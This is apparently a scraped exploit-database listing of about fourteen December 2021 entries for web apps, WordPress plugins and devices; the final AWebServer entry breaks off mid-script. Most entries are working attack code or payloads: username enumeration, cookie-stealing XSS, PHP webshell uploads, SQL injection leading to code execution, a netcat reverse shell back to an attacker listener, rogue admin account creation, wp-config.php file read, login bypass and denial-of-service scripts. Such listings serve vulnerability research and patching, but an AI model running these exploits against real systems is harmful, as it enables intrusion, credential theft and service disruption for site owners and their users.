
-
ConnectWise Control 19.2.24707 - Username Enumeration
# Exploit Title: ConnectWise Control 19.2.24707 - Username Enumeration # Date: 17/12/2021 # Exploit Author: Luca Cuzzolin aka czz78 # Vendor Homepage: https://www.connectwise.com/ # Version: vulnerable <= 19.2.24707 # CVE : CVE-2019-16516 # https://github.com/czz/ScreenConnect-UserEnum from multiprocessing import Process, Queue from statistics import mean from urllib3 import exceptions as urlexcept import argparse import math import re import requests class bcolors: HEADER = '\033[95m' OKBLUE = '\033[94m' OKCYAN = '\033[96m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' headers = [] def header_function(header_line): headers.append(header_line) def process_enum(queue, found_queue, wordlist, url, payload, failstr, verbose, proc_id, stop, proxy): try: # Payload to dictionary payload_dict = {} for load in payload: split_load = load.split(":") if split_load[1] != '{USER}': payload_dict[split_load[0]] = split_load[1] else: payload_dict[split_load[0]] = '{USER}' # Enumeration total = len(wordlist) for counter, user in enumerate(wordlist): user_payload = dict(payload_dict) for key, value in user_payload.items(): if value == '{USER}': user_payload[key] = user dataraw = "".join(['%s=%s&' % (key, value) for (key, value) in user_payload.items()])[:-1] headers={"Accept": "*/*" , "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"} req = requests.request('POST',url,headers=headers,data=dataraw, proxies=proxies) x = "".join('{}: {}'.format(k, v) for k, v in req.headers.items()) if re.search(r"{}".format(failstr), str(x).replace('\n','').replace('\r','')): queue.put((proc_id, "FOUND", user)) found_queue.put((proc_id, "FOUND", user)) if stop: break elif verbose: queue.put((proc_id, "TRIED", user)) queue.put(("PERCENT", proc_id, (counter/total)*100)) except 
(urlexcept.NewConnectionError, requests.exceptions.ConnectionError): print("[ATTENTION] Connection error on process {}! Try lowering the amount of threads with the -c parameter.".format(proc_id)) if __name__ == "__main__": # Arguments parser = argparse.ArgumentParser(description="http://example.com/Login user enumeration tool") parser.add_argument("url", help="http://example.com/Login") parser.add_argument("wordlist", help="username wordlist") parser.add_argument("-c", metavar="cnt", type=int, default=10, help="process (thread) count, default 10, too many processes may cause connection problems") parser.add_argument("-v", action="store_true", help="verbose mode") parser.add_argument("-s", action="store_true", help="stop on first user found") parser.add_argument("-p", metavar="proxy", type=str, help="socks4/5 http/https proxy, ex: socks5://127.0.0.1:9050") args = parser.parse_args() # Arguments to simple variables wordlist = args.wordlist url = args.url payload = ['ctl00%24Main%24userNameBox:{USER}', 'ctl00%24Main%24passwordBox:a', 'ctl00%24Main%24ctl05:Login', '__EVENTTARGET:', '__EVENTARGUMENT:', '__VIEWSTATE:'] verbose = args.v thread_count = args.c failstr = "PasswordInvalid" stop = args.s proxy= args.p print(bcolors.HEADER + """ __ ___ __ ___ | | |__ |__ |__) |__ |\ | | | |\/| |__| ___| |___ | \ |___ | \| |__| | | ScreenConnect POC by czz78 :) """+ bcolors.ENDC); print("URL: "+url) print("Payload: "+str(payload)) print("Fail string: "+failstr) print("Wordlist: "+wordlist) if verbose: print("Verbose mode") if stop: print("Will stop on first user found") proxies = {'http': '', 'https': ''} if proxy: proxies = {'http': proxy, 'https': proxy} print("Initializing processes...") # Distribute wordlist to processes wlfile = open(wordlist, "r", encoding="ISO-8859-1") # or utf-8 tothread = 0 wllist = [[] for i in range(thread_count)] for user in wlfile: wllist[tothread-1].append(user.strip()) if (tothread < thread_count-1): tothread+=1 else: tothread = 0 # Start 
processes tries_q = Queue() found_q = Queue() processes = [] percentage = [] last_percentage = 0 for i in range(thread_count): p = Process(target=process_enum, args=(tries_q, found_q, wllist[i], url, payload, failstr, verbose, i, stop, proxy)) processes.append(p) percentage.append(0) p.start() print(bcolors.OKBLUE + "Processes started successfully! Enumerating." + bcolors.ENDC) # Main process loop initial_count = len(processes) while True: # Read the process output queue try: oldest = tries_q.get(False) if oldest[0] == 'PERCENT': percentage[oldest[1]] = oldest[2] elif oldest[1] == 'FOUND': print(bcolors.OKGREEN + "[{}] FOUND: {}".format(oldest[0], oldest[2]) + bcolors.ENDC) elif verbose: print(bcolors.OKCYAN + "[{}] Tried: {}".format(oldest[0], oldest[2]) + bcolors.ENDC) except: pass # Calculate completion percentage and print if /10 total_percentage = math.ceil(mean(percentage)) if total_percentage % 10 == 0 and total_percentage != last_percentage: print("{}% complete".format(total_percentage)) last_percentage = total_percentage # Pop dead processes for k, p in enumerate(processes): if p.is_alive() == False: processes.pop(k) # Terminate all processes if -s flag is present if len(processes) < initial_count and stop: for p in processes: p.terminate() # Print results and terminate self if finished if len(processes) == 0: print(bcolors.OKBLUE + "EnumUser finished, and these usernames were found:" + bcolors.ENDC) while True: try: entry = found_q.get(False) print(bcolors.OKGREEN + "[{}] FOUND: {}".format(entry[0], entry[2]) + bcolors.ENDC) except: break quit()
-
WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated)
# Exploit Title: WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated) # Date: 22/12/2021 # Exploit Author: gx1 <gaetano.perrone[at]secsi.io> # Vulnerability Discovery: Gaetano Perrone # Vendor Homepage: https://www.crmperks.com/ # Software Link: https://wordpress.org/plugins/contact-form-entries/ # Version: < 1.1.7 # Tested on: any # References: * https://wpscan.com/vulnerability/acd3d98a-aab8-49be-b77e-e8c6ede171ac * https://secsi.io/blog/cve-2021-25080-finding-cross-site-scripting-vulnerabilities-in-headers/ # Description: Contact Form Entries < 1.1.7 is vulnerable to Unauthenticated Stored Cross-Site Scripting # Technical Details and Exploitation: CRM Form Entries CRM is vulnerable to a Stored XSS in Client IP field. When the user uploads a new form, CRM Form Entries checks for the client IP in order to save information about the user: =============================================================================================================== public function get_ip(), wp-content/plugins/contact-form-entries/contact-form-entries.php, line 1388 ============================================================================================================== The user can set an arbitrary "HTTP_CLIENT_IP" value, and the value is stored inside the database. # Proof Of Concept: Suppose that you have a Contact Form, intercept the POST request and insert the following Client-IP header =============================================================================================================== POST /index.php?rest_route=/contact-form-7/v1/contact-forms/10/feedback HTTP/1.1 Host: dsp.com:11080 Content-Length: 1411 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 ... 
Client-IP: <img src=a onerror=alert(1)> ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7" 10 ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_version" 5.3.1 ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_locale" en_US ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_unit_tag" wpcf7-f10-p13-o1 ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_container_post" Content-Disposition: form-data; name="_wpcf7" 10 ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_version" 5.3.1 ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_locale" en_US ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_unit_tag" wpcf7-f10-p13-o1 ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_container_post" ... =============================================================================================================== The request is acccepted, and the code navigates the section $_SERVER['HTTP_CLIENT_IP'] , ip is injected and saved inside the database. When the administrator clicks on the entry element in the plugin, the XSS is triggered. # Solution: Upgrade Contact Form Entries to version 1.1.7
-
RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated) # Date: 25/07/2021 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://ritecms.com/ # Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip # Version: <= 3.1.0 # Tested on: Windows 10, Ubuntu 18, XAMPP # Google Dork: intext:"Powered by RiteCMS" # Reference: https://gist.github.com/faisalfs10x/bd12e9abefb0d44f020bf297a14a4597 """ ################ # Description # ################ # RiteCMS version 3.1.0 and below suffers from a remote code execution in admin panel. An authenticated attacker can upload a php file and bypass the .htacess configuration that deny execution of .php files in media and files directory by default. # There are 4 ways of bypassing the current file upload protection to achieve remote code execution. # Method 1: Delete the .htaccess file in the media and files directory through the files manager module and then upload the php file - RCE achieved # Method 2: Rename .php file extension to .pHp or any except ".php", eg shell.pHp and upload the shell.pHp file - RCE achieved # Method 3: Chain with Arbitrary File Overwrite vulnerability by uploading .php file to web root because .php execution is allow in web root - RCE achieved By default, attacker can only upload image in media and files directory only - Arbitrary File Overwrite vulnerability. 
Intercept the request, modify file_name param and place this payload "../webrootExec.php" to upload the php file to web root body= Content-Disposition: form-data; name="file_name" body= ../webrootExec.php So, webshell can be accessed in web root via http://localhost/ritecms.v3.1.0/webrootExec.php # Method 4: Upload new .htaccess to overwrite the old one with content like below for allowing access to one specific php file named "webshell.php" then upload PHP webshell.php - RCE achieved $ cat .htaccess <Files *.php> deny from all </Files> <Files ~ "webshell\.php$"> Allow from all </Files> ################################### # PoC for webshell using Method 2 # ################################### Steps to Reproduce: 1. Login as admin 2. Go to Files Manager 3. Choose a directory to upload .php file either media or files directory. 4. Then, click Upload file > Browse.. 3. Upload .php file with extension of pHp, eg webshell.pHp - to bypass .htaccess 4. The webshell.pHp is available at http://localhost/ritecms.v3.1.0/media/webshell.pHp - if you choose media directory else switch to files directory Request: ======== POST /ritecms.v3.1.0/admin.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------410923806710384479662671954309 Content-Length: 1744 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager&action=upload&directory=media Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Sec-GPC: 1 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="mode" filemanager 
-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="file"; filename="webshell.pHp" Content-Type: application/octet-stream <?php system($_GET[base64_decode('Y21k')]);?> -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="directory" media -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="file_name" -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="upload_mode" 1 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="resize_xy" x -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="resize" 640 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="compression" 80 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="thumbnail_resize_xy" x -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="thumbnail_resize" 150 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="thumbnail_compression" 70 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="upload_file_submit" OK - Upload file -----------------------------410923806710384479662671954309-- #################### # Webshell access: # #################### # Webshell access via: PoC: http://localhost/ritecms.v3.1.0/media/webshell.pHp?cmd=id # Output: uid=33(www-data) gid=33(www-data) groups=33(www-data) """
-
Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS)
# Exploit Title: Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS) # Discovered by: Yehia Elghaly # Discovered Date: 22/12/2021 # Vendor Homepage: https://www.accu-time.com/ # Software Link : https://www.accu-time.com/maximus-employee-time-clock-3/ # Tested Version: 1.0 # Vulnerability Type: Buffer Overflow (DoS) Remote # Tested on OS: linux # Description: Accu-Time Systems MAXIMUS 1.0 Telnet Remote Buffer Overflow # Steps to reproduce: # 1. - Accu-Time Systems MAXIMUS 1.0 Telnet listening on port 23 # 2. - Run the Script from remote PC/IP # 3. - Telnet Crashed #!/usr/bin/env python3 import socket import sys print("#######################################################") print("# Accu-Time Systems MAXIMUS Remote (BUffer Overflow) #") print("# -------------------------- #") print("# BY Yehia Elghaly #") print("#######################################################") if (len(sys.argv)<2): print ("Usage: %s <Target Host> ") % sys.argv[0] print ("Example: %s 192.168.113.1 ") % sys.argv[0] exit(0) print ("\nSending Evil.......Buffer...") s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect((sys.argv[1], 23)) buffer = "A"*9400 s.send(" Crashed Check the connection") Print ("Crashed") except: print ("Could not connect to ACCU Time Telnet!")
-
WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection
# Exploit Title: WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection # Date 22/12/2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://www.plugins-market.com/ # Software Link: https://downloads.wordpress.org/plugin/wp-stats-manager.4.7.zip # Version: <= 4.7 # Tested on: Ubuntu 18.04 # CVE: CVE-2021-24750 # CWE: CWE-89 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24750/README.md ''' Description: The plugin does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks ''' # Banner: banner = ''' ___ _ _ ____ ___ ___ ___ __ ___ __ ___ ___ ___ / __)( \/ )( ___)___(__ \ / _ \(__ \ / )___(__ \ /. |(__ )| __) / _ \ ( (__ \ / )__)(___)/ _/( (_) )/ _/ )((___)/ _/(_ _)/ / |__ \( (_) ) \___) \/ (____) (____)\___/(____)(__) (____) (_)(_/ (___/ \___/ [+] WP Visitor Statistics SQL Injection [@] Developed by Ron Jost (Hacker5preme) ''' print(banner) import argparse import requests from datetime import datetime # User-Input: my_parser = argparse.ArgumentParser(description='Wordpress Plugin WP Visitor Statistics - SQL Injection') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) my_parser.add_argument('-u', '--USERNAME', type=str) my_parser.add_argument('-p', '--PASSWORD', type=str) my_parser.add_argument('-C', '--COMMAND', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH username = args.USERNAME password = args.PASSWORD command = args.COMMAND print('') print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) print('') # Authentication: session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' check = session.get(auth_url) # Header: header = { 'Host': 
target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' } # Body: body = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' } auth = session.post(auth_url, headers=header, data=body) # Exploit: exploit_url = 'http://' + target_ip + ':' + target_port + '/wordpress/wp-admin/admin-ajax.php?action=refDetails&requests={"refUrl":"' + "' " + command + '"}' exploit = session.get(exploit_url) print(exploit.text) print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
-
Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Exploit Title: Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Date: 23/12/2021 # Exploit Author: Jeremiasz Pluta # Vendor Homepage: https://github.com/rskoolrash/Online-Admission-System # Software Link: https://github.com/rskoolrash/Online-Admission-System # Tested on: LAMP Stack (Debian 10) #!/usr/bin/python import sys import re import argparse import requests import time import subprocess print('Exploit for Online Admission System 1.0 - Remote Code Execution (Unauthenticated)') path = '/' #change me if the path to the /oas is in the root directory or another subdir class Exploit: def __init__(self, target_ip, target_port, localhost, localport): self.target_ip = target_ip self.target_port = target_port self.localhost = localhost self.localport = localport def exploitation(self): payload = """<?php system($_GET['cmd']); ?>""" payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f""" url = 'http://' + target_ip + ':' + target_port + path r = requests.Session() print('[*] Resolving URL...') r1 = r.get(url + 'documents.php') time.sleep(3) #Upload the payload file print('[*] Uploading the webshell payload...') files = { 'fpic': ('cmd.php', payload + '\n', 'application/x-php'), 'ftndoc': ('', '', 'application/octet-stream'), 'ftcdoc': ('', '', 'application/octet-stream'), 'fdmdoc': ('', '', 'application/octet-stream'), 'ftcdoc': ('', '', 'application/octet-stream'), 'fdcdoc': ('', '', 'application/octet-stream'), 'fide': ('', '', 'application/octet-stream'), 'fsig': ('', '', 'application/octet-stream'), } data = {'fpicup':'Submit Query'} r2 = r.post(url + 'documents.php', files=files, allow_redirects=True, data=data) time.sleep(3) print('[*] Setting up netcat listener...') listener = subprocess.Popen(["nc", "-nvlp", self.localport]) time.sleep(3) print('[*] Spawning reverse shell...') print('[*] Watchout!') r3 = r.get(url + '/studentpic/cmd.php?cmd=' + payload2) 
time.sleep(3) if (r3.status_code == 200): print('[*] Got shell!') while True: listener.wait() else: print('[-] Something went wrong!') listener.terminate() def get_args(): parser = argparse.ArgumentParser(description='Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)') parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP') parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port') parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP') parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port') args = parser.parse_args() return args args = get_args() target_ip = args.url target_port = args.target_port localhost = args.localhost localport = args.localport exp = Exploit(target_ip, target_port, localhost, localport) exp.exploitation()
-
Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)
# Exploit Title: Movie Rating System 1.0 - SQLi to RCE (Unauthenticated) # Date: 22/12/2021 # Exploit Author: Tagoletta (Tağmaç) # Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html # Version: 1.0 # Tested on: Ubuntu # This exploit only works correctly if user is database administrator. if not user is database administrator, continue with sql injection payloads. import requests import random import string from bs4 import BeautifulSoup url = input("TARGET = ") if not url.startswith('http://') and not url.startswith('https://'): url = "http://" + url if not url.endswith('/'): url = url + "/" payload = "<?php if(isset($_GET['tago'])){ $cmd = ($_GET['tago']); system($cmd); die; } ?>" let = string.ascii_lowercase shellname = ''.join(random.choice(let) for i in range(15)) resp = requests.get(url) htmlParser = BeautifulSoup(resp.text, 'html.parser') getMenu = htmlParser.findAll("a", {"class": "nav-link"}) selectPage = "" for i in getMenu: if "movie" in i.text.lower(): selectPage = i["href"] break selectPage = selectPage.replace("./","") findSql = url + selectPage resp = requests.get(findSql) htmlParser = BeautifulSoup(resp.text, 'html.parser') movieList = htmlParser.findAll("a", {"class" : "card card-outline card-primary shadow rounded-0 movie-item text-decoration-none text-dark"}) sqlPage = movieList[0]["href"] sqlPage = sqlPage.replace("./","") sqlPage = url + sqlPage print("\nFinding path") findPath = requests.get(sqlPage + '\'') findPath = findPath.text[findPath.text.index("<b>Warning</b>: ")+17:findPath.text.index("</b> on line ")] findPath = findPath[findPath.index("<b>")+3:len(findPath)] print("injection page: "+sqlPage) parser = findPath.split('\\') parser.pop() findPath = "" for find in parser: findPath += find + "/" print("\nFound Path : " + findPath) SQLtoRCE = "-1881' OR 1881=1881 LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -" SQLtoRCE = 
SQLtoRCE.replace("#PATH#",findPath+shellname+".php") SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex()) print("\n\nShell Uploading...") status = requests.get(sqlPage+SQLtoRCE) shellOutput = requests.get(url+shellname+".php?tago=whoami") print("\n\nShell Output : "+shellOutput.text) print("\nShell Path : " + url+shellname+".php")
-
Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated)
# Exploit Title: Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated) # Date: 22/12/2021 # Exploit Author: Tagoletta (Tağmaç) # Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html # Version: 1.0 # Tested on: Windows import requests import json url = input('Url:') if not url.startswith('http://') and not url.startswith('https://'): url = "http://" + url if not url.endswith('/'): url = url + "/" Username = "tago" Password = "tagoletta" reqUrl = url + "classes/Users.php?f=save" reqHeaders = { "Accept": "*/*", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryTagmac", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Origin": url} reqData = "------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nTago\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nLetta\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+Username+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n"+Password+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n1\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryTagmac--\r\n" resp = requests.post(reqUrl, headers=reqHeaders, data=reqData) if resp.status_code == 200: print("Admin account created") reqUrl = url + "classes/Login.php?f=login" reqHeaders = { "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 
(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Origin": url } reqData = {"username": ""+Username+"", "password": ""+Password+""} resp = requests.post(reqUrl, headers=reqHeaders, data=reqData) data = json.loads(resp.text) status = data["status"] if status == "success": print("Login Successfully\nUsername:"+ Username+"\nPassword:"+Password) else: print("Exploited but not loginned") else: print("Not injectable")
-
Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS)
# Exploit Title: Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS) # Google Dork: NA # Date: 03-OCT-2021 # Exploit Author: Akash Rajendra Patil # Vendor Homepage: https://www.yahoobaba.net/project/library-system-in-php # Software Link: https://www.yahoobaba.net/project/library-system-in-php # Version: V 1.0 # Tested on: WAMPP # Description # Library System in PHP V1.0 is vulnerable to stored cross-site scripting because of insufficient sanitisation of user-supplied data. # Proof of Concept (PoC) : #Exploit: 1) Go to: http://localhost/library-system/dashboard.php 2) Log in as admin using the test credentials: admin/admin 3) Go to: http://localhost/library-system/update-publisher.php?pid=12 4) Enter the following payload in the publisher field: <script>alert(document.cookie)</script> 5) Click on Save 6) The payload is stored and fires when the page is rendered
-
WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated)
# Exploit Title: WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated) # Date: 23/12/2021 # Exploit Authors: Nicole Sheinin, Liad Levy # Vendor Homepage: https://wordpress.org/plugins/seo-local-rank/ # Software Link: https://plugins.svn.wordpress.org/seo-local-rank/tags/2.2.2/ # Version: versions <= 2.2.2 # Tested on: MacOS # CVE: CVE-2021-39312 # Github repo: #!/usr/bin/env python3 import argparse, textwrap import requests import sys parser = argparse.ArgumentParser(description="Exploit The True Ranker plugin - Read arbitrary files", formatter_class=argparse.RawTextHelpFormatter) group_must = parser.add_argument_group('must arguments') group_must.add_argument("-u","--url", help="WordPress Target URL (Example: http://127.0.0.1:8080)",required=True) parser.add_argument("-p","--payload", help="Path to read [default] ../../../../../../../../../../wp-config.php", default="../../../../../../../../../../wp-config.php",required=False) args = parser.parse_args() if len(sys.argv) <= 2: print (f"Exploit Usage: ./exploit.py -h [help] -u [url]") sys.exit() HOST = args.url PAYLOAD = args.payload url = "{}/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php".format(HOST) payload = "/scripts/simple.php/{}".format(PAYLOAD) r = requests.post(url,data={'src': payload}) if r.status_code == 200: print(r.text) else: print("No exploit found")
-
SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS)
# Exploit Title: SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS) # Date: 28/12/2021 # Exploit Author: Momen Eldawakhly - Cyber Guy - (Resecurity Inc) # Vendor Homepage: https://www.safarimontage.com/ # Version: 8.3 and 8.5 # Tested on: Ubuntu Linux [Firefox] # CVE: CVE-2021-45425 # Proof of Concept: GET /redirect.php?cmd=invalid%27%22()%26%25%3C/body%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E&ret=3 HTTP/1.1 Host: vulnIP Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=SSSION; lang=en Connection: close
-
Nettmp NNT 5.1 - SQLi Authentication Bypass
# Exploit Title: Nettmp NNT 5.1 - SQLi Authentication Bypass # Date: 23/12/2021 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: https://wiki.nettemp.tk # Software Link: https://wiki.nettemp.tk # Version: nettmp NNT # Tested on: Linux (Ubuntu 20.04) Payload: username: 1' or 1=1;-- password: \ Proof of Concept: POST /index.php?id=status HTTP/1.1 Host: vuln.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 55 Origin: http://vuln.com DNT: 1 Connection: close Referer: http://vulnIP/index.php?id=status Cookie: PHPSESSID=v8hmih4u92mftquen8gtvpstsq Upgrade-Insecure-Requests: 1 username=1%27+or+1%3D1%3B--&password=%5C&form_login=log
-
Hostel Management System 2.1 - Cross Site Scripting (XSS)
# Exploit Title: Hostel Management System 2.1 - Cross Site Scripting (XSS) # Date: 26/12/2021 # Exploit Author: Chinmay Vishwas Divekar # Vendor Homepage: https://phpgurukul.com/hostel-management-system/ # Software Link: https://phpgurukul.com/hostel-management-system/ # Version: V 2.1 # Tested on: PopOS_20.10 *Steps to reproduce* 1) Open the book-hostel page using the following URL: https://localhost/hostel/book-hostel.php 2) Enter the XSS payload <img src=x onerror=alert(String.fromCharCode(88,83,83));> in various input fields. 3) The server accepts the payload in the input fields without sanitisation. Affected input fields: Correspondence Address, Guardian Relation, Permanent Address
-
AWebServer GhostBuilding 18 - Denial of Service (DoS)
# Exploit Title: AWebServer GhostBuilding 18 - Denial of Service (DoS) # Date: 28/12/2021 # Exploit Author: Andres Ramos [Invertebrado] # Vendor Homepage: http://sylkat-tools.rf.gd/awebserver.htm # Software Link: https://play.google.com/store/apps/details?id=com.sylkat.apache&hl=en # Version: AWebServer GhostBuilding 18 # Tested on: Android #!/usr/bin/python3 # ********************************************************************************* # * Author: Andres Ramos [Invertebrado] * # * AWebServer GhostBuilding 18 - Remote Denial of Service (DoS) & System Crash * # ********************************************************************************* import signal import requests from pwn import * #Colors class colors(): GREEN = "\033[0;32m\033[1m" END = "\033[0m" RED = "\033[0;31m\033[1m" BLUE = "\033[0;34m\033[1m" YELLOW = "\033[0;33m\033[1m" PURPLE = "\033[0;35m\033[1m" TURQUOISE = "\033[0;36m\033[1m" GRAY = "\033[0;37m\033[1m" exit = False def def_handler(sig, frame): print(colors.RED + "\n[!] Exiting..." + colors.END) exit = True sys.exit(0) if threading.activeCount() > 1: os.system("tput cnorm") os._exit(getattr(os, "_exitcode", 0)) else: os.system("tput cnorm") sys.exit(getattr(os, "_exitcode", 0)) signal.signal(signal.SIGINT, def_handler) if len(sys.argv) < 3: print(colors.RED + "\n[!] 
